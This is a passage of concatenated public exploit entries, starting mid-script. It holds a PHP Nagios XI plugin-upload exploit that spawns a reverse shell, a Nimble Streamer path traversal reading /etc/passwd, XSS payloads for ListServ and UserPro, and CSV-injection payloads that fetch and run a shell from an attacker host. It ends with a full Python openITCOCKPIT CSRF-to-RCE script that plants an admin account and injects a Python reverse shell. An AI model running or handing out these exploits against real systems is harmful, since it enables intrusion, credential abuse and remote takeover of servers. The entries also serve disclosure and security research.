'Accept-Language: en-GB,en;q=0.5'; $headers[] = 'Referer: ' . $userVal['pluginUrl']; $headers[] = 'Content-Type: multipart/form-data; boundary=---------------------------18467633426500'; $headers[] = 'Connection: keep-alive'; $headers[] = 'Upgrade-Insecure-Requests: 1'; curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); echo "[+] Uploading payload...\n"; $response = curl_exec($curl); $dom = new DOMDocument(); @$dom->loadHTML($response); $upload = FALSE; foreach ($dom->getElementsByTagName('div') as $div) { if ($div->getAttribute('class') === 'message') { if (strpos($div->nodeValue, 'New plugin was installed') !== FALSE) { $upload = TRUE; } } } if ($upload) { echo "[+] Payload uploaded\n"; } else { echo '[+] Unable to upload payload'; exit(1); } } function triggerPayload($userVal) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $userVal['profileGenUrl']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate'); curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt'); $headers = array(); $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $headers[] = 'Connection: keep-alive'; $headers[] = 'Upgrade-Insecure-Requests: 1'; curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); echo "[+] Triggering payload: if successful, a reverse shell will spawn at {$userVal['reverseip']}:{$userVal['reverseport']}\n"; curl_exec($curl); } function showHelp() { echo "Usage: php exploit.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port\n"; exit(0); } function parseArgs($argv) { $userVal = array(); for ($i = 1; $i < count($argv); $i++) { if (preg_match('/^--([^=]+)=(.*)/', $argv[$i], $match)) { $userVal[$match[1]] = $match[2]; } } if (!isset($userVal['host']) || !isset($userVal['ssl']) || !isset($userVal['user']) || !isset($userVal['pass']) || !isset($userVal['reverseip']) || !isset($userVal['reverseport'])) { showHelp(); } $userVal['ssl'] == 'true' ? $userVal['proto'] = 'https://' : $userVal['proto'] = 'http://'; $userVal['loginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/login.php'; $userVal['pluginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/admin/monitoringplugins.php'; $userVal['profileGenUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/includes/components/profile/profile.php?cmd=download'; return $userVal; } function checkCookie() { if (file_exists('cookie.txt')) { echo "cookie.txt already exists - delete prior to running"; exit(1); } }

# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal # Exploit Author: MAYASEVEN # Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/" # Published on 08/04/2019 # Vendor Homepage at "https://wmspanel.com/nimble" # Affected Version 3.0.2-2 to 3.5.4-9 # Tested on 3.5.4-9 # CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal # Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. # Successful exploitation could allow an attacker to traverse the file system to access # files or directories that are outside of the restricted directory on the remote server. POC : - http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448

# Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS) # Google Dork: intitle:LISTSERV 16.5 # Date: 08-21-2019 # Exploit Author: MTK (http://mtk911.cf/) # Vendor Homepage: http://www.lsoft.com/ # Softwae Link: http://www.lsoft.com/products/listserv.asp # Version: Older than Ver 16.5-2018a # Tested on: IIS 8.5/10.0 - Firefox/Windows # CVE : CVE-2019-15501 # Software description: The term Listserv has been used to refer to electronic mailing list software applications in general, but is more properly applied to a few early instances of such software, which allows a sender to send one email to the list, and then transparently sends it on to the addresses of the subscribers to the list. # POC 1. http://127.0.0.1/scripts/wa.exe?OK=<PAYLOAD> 2. http://127.0.0.1/scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'MTK')> # References: 1. http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf 2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501

# Exploit Title: UserPro <= 4.9.32 Reflected XSS # Google Dork: intitle:"Index of" intitle:"UserPro" -uploads # Date: 25 August 2019 # Exploit Author: Damian Ebelties (https://zerodays.lol/) # Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 # Version: <= 4.9.32 # Tested on: Ubuntu 18.04.1 # CVE: CVE-2019-14470 The WordPress plug-in 'UserPro' uses a Instagram library (Instagram PHP API V2 by cosenary) that is vulnerable for Reflected Cross-Site Scripting (XSS). There is more vulnerable code in 'UserPro' core, might release that later. As of today (25 August 2019) this issue is unfixed. Vulnerable code: (success.php on line 36) if (isset($_GET['error'])) { echo 'An error occurred: ' . $_GET['error_description']; } > https://github.com/cosenary/Instagram-PHP-API/blob/master/example/success.php#L36 Proof-of-Concept: https://domain.tld/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=<PAYLOAD>

# Exploit Title: Wordpress Plugin Import Export WordPress Users <= 1.3.1 - CSV Injection # Exploit Author: Javier Olmedo # Contact: @jjavierolmedo # Website: https://sidertia.com # Date: 2018-08-22 # Google Dork: inurl:"/wp-content/plugins/users-customers-import-export-for-wp-woocommerce" # Vendor: WebToffee # Software Link: https://downloads.wordpress.org/plugin/users-customers-import-export-for-wp-woocommerce.1.3.1.zip # Affected Version: 1.3.1 and before # Active installations: +20,000 # Patched Version: update to 1.3.2 version # Category: Web Application # Platform: PHP # Tested on: Win10x64 # CVE: 2019-15092 # References: # https://hackpuntes.com/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/ # https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 # 1. Technical Description # Wordpress Plugin Import Export WordPress Users version 1.3.1. and before are affected by Remote Code # Execution through the CSV injection vulnerability. This allows any application user to inject commands # as part of the fields of his profile and these commands are executed when a user with greater privilege # exports the data in CSV and opens that file on his machine. # 2. Vulnerable code # The function do_export() from WF_CustomerImpExpCsv_Exporter class does not check if fields beggings # with (=, +, -, @) characters so the fields name, surname, alias or display_name are vulnerable to CSV Injection. # 3. Proof Of Concept (PoC) # 3.1 Login with subscriber user and change the fields First name, Surname and Alias with payloads. # 3.2 Login with a high privileges user and export all users to CSV. # 3.3 When the user with high privileges logs in to the application, export data in CSV and opens the # generated file, the command is executed and the shell will run open on the machine. # 4. Payloads =cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 +cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 -cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 @cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0 # 5. Timeline # 15, august 2019 - [RESEARCHER] Discover # 15, august 2019 - [RESEARCHER] Report to Webtoffee support # 16, august 2019 - [DEVELOPER] More information request # 16, august 2019 - [RESEARCHER] Detailed vulnerability report # 19, august 2019 - [DEVELOPER] Unrecognized vulnerability # 22, august 2019 - [RESEARCHER] Public disclosure

# Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE # Google Dork: N/A # Date: 26-08-2019 # Exploit Author: Julian Rittweger # Vendor Homepage: https://openitcockpit.io/ # Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2 # Fixed in: 3.7.1 | https://github.com/it-novum/openITCOCKPIT/releases # Version: 3.6.1-2 # Tested on: Debian 9 # CVE : 2019-10227 # Exploit Requirements: pip3 install bs4 requests && apt install netcat #!/usr/bin/env python import requests, urllib3, os import http.server, socketserver from bs4 import BeautifulSoup as bs urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) print(""" -- openITCOCKPIT v.3.6.1-2 [CSRF 2 RCE] -- """) # Setup values RHOST = input('[x] Enter IP of remote machine: ') LHOST = input('[x] Enter IP of local machine: ') RPORT = int(input('[x] Enter local port (back-connection): ')) LPORT = int(input('[x] Enter local port (payload-hosting): ')) print('[-] Generating CSRF form using the following credentials: "[email protected] - letmein1337" ..') # Generate file which serves CSRF payload pl = open('./index.html', 'w') # Register HTTP server handler = http.server.SimpleHTTPRequestHandler csrf = """ <iframe style="display:none;" name="csrff"></iframe> <form method="post" action="https://""" + RHOST + """/users/add" target="csrff" style="display:none;"> <input type="text" name="_method" value="POST"> <input type="text" name="data[User][Container][]" value="1"> <input type="text" name="data[ContainerUserMembership][1]" value="2"> <input type="text" name="data[User][usergroup_id]" value="1"> <input type="text" name="data[User][status]" value="1"> <input type="text" name="data[User][email]" value="[email protected]"> <input type="text" name="data[User][firstname]" value="Mr"> <input type="text" name="data[User][lastname]" value="Nice"> <input type="text" name="data[User][new_password]" value="letmein1337"> <input type="text" name="data[User][confirm_new_password]" value="letmein1337"> <input type="submit"> </form> <script> function Redirect() { window.location="https://""" + RHOST + """/login/logout"; } document.forms[0].submit(); setTimeout('Redirect()', 3000); </script> """ pl.write(csrf) pl.close() httpd = socketserver.TCPServer(("", LPORT), handler) # Start HTTP server, quit on keyboard interrupt try: print('[!] Serving payload at port : ' + str(LPORT) + ', press STRG+C if you registered requests!') print('[!] Send this URL to a logged-in administrator: http://' + LHOST + ':' + str(LPORT)) httpd.serve_forever() except KeyboardInterrupt: httpd.socket.close() print('\n[-] Starting exploitation ..') print('[-] Logging in ..') # Proceed login with generated credentials c = requests.post('https://' + RHOST + '/login/login', data={'_method' : 'POST', 'data[LoginUser][username]' : '[email protected]', 'data[LoginUser][password]' : 'letmein1337'}, verify=False, allow_redirects=False).headers['Set-Cookie'] print('[!] Received cookie: ' + c.split(';')[0]) print('[-] Creating reverse-shell as macro ..') # Insert a new macro identified as $USER99$ makro = {'_method' : 'POST', 'data[0][Macro][id]' : 1, 'data[0][Macro][name]' : '$USER1$', 'data[0][Macro][value]' : '/opt/openitc/nagios/libexec', 'data[0][Macro][description]' : 'default', 'data[0][Macro][password]' : 0, 'data[1][Macro][id]' : 2, 'data[1][Macro][name]' : '$USER99$', 'data[1][Macro][value]' : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(RPORT) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", 'data[1][Macro][password]' : 1} requests.post('https://' + RHOST + '/macros', data=makro, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}) print('[-] Inserting macro as command ..') # Register a new command using the inserted macro requests.post('https://' + RHOST + '/commands/add/_controller:commands/_action:hostchecks', data={'_method' : 'POST', 'data[Command][command_type]' : 2, 'data[Command][name]' : 'pwned', 'data[Command][command_line]' : '$USER99$'}, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}) h = bs(requests.get('https://' + RHOST + '/commands/hostchecks', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}).text, 'html.parser') ids = [] # Fetch current commands by ID for i in h.find_all('form', {'action': lambda x : x.startswith('/commands/delete')}): ids.append(i.get('action').split('/')[-1]) print('[!] ID of command identified as: ' + str(ids[-1])) print('[-] Updating default host ..') # Update host, using the new malicious "hostcheck" command sett = {'_method':'POST','data[Host][id]':'1','data[Host][container_id]':'1','data[Host][shared_container]':'','data[Host][hosttemplate_id]':'1','data[Host][name]':'localhost','data[Host][description]':'default+host','data[Host][address]':'127.0.0.1','data[Host][Hostgroup]':'','data[Host][Parenthost]':'','data[Host][notes]':'','data[Host][host_url]':'','data[Host][priority]':'1','data[Host][tags]':'','data[Host][notify_period_id]':'1','data[Host][notification_interval]':'0','data[Host][notification_interval]':'0','data[Host][notify_on_recovery]':'0','data[Host][notify_on_recovery]':'1','data[Host][notify_on_down]':'0','data[Host][notify_on_unreachable]':'0','data[Host][notify_on_unreachable]':'1','data[Host][notify_on_flapping]':'0','data[Host][notify_on_downtime]':'0','data[Host][active_checks_enabled]':'0','data[Host][active_checks_enabled]':'1','data[Host][Contact]':'','data[Host][Contact][]':'1','data[Host][Contactgroup]':'','data[Host][command_id]':ids[-1],'data[Host][check_period_id]':'1','data[Host][max_check_attempts]':'3','data[Host][check_interval]':'120','data[Host][check_interval]':'120','data[Host][retry_interval]':'120','data[Host][retry_interval]':'120','data[Host][flap_detection_enabled]':'0','data[Host][flap_detection_on_up]':'0','data[Host][flap_detection_on_down]':'0', 'data[Host][flap_detection_on_unreachable]' : 0} requests.post('https://' + RHOST + '/hosts/edit/1/_controller:hosts/_action:browser/_id:1/', data=sett, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}) # Refresh host configuration print('[-] Refreshing host configuration ..') requests.get('https://' + RHOST + '/exports/launchExport/0.json', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}, headers={'X-Requested-With' : 'XMLHttpRequest'}) print('[!] Done! Enjoy your shell (popup in approx. 30s): ') # We did it! os.system('nc -lvp ' + str(RPORT))